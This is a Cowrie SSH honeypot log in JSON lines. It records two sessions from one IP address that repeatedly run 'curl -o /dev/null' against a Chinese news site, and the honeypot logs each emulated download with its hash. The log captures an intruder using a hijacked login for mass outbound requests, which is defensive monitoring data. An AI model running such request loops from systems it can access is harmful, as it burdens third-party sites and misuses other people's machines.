{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.043949Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.056935Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.065634Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.068846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.069814Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.071976Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.072999Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.107828Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.108982Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.112400Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.113901Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.114933Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.117680Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.122355Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.129782Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.147028Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.148014Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.159519Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.160417Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.171055Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.185117Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.186216Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.191840Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.198857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.199836Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.223973Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.227005Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.228010Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.239581Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.240616Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.262507Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.263759Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.269296Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.279461Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.280967Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.282522Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.292908Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.301444Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.302467Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.319816Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.326270Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.328718Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.329665Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.343515Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.344549Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.350780Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.373173Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.374228Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.386117Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.387179Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.400135Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.412105Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.413289Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.414041Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.416845Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.423845Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.424775Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.434575Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.436393Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.459501Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.460482Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.464663Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.465932Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.466636Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.503533Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.504257Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.507807Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.509660Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.512504Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.522407Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.530180Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.543811Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.546829Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.547710Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.552470Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.553358Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.554284Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.588300Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.589417Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.594243Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.597048Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.597945Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
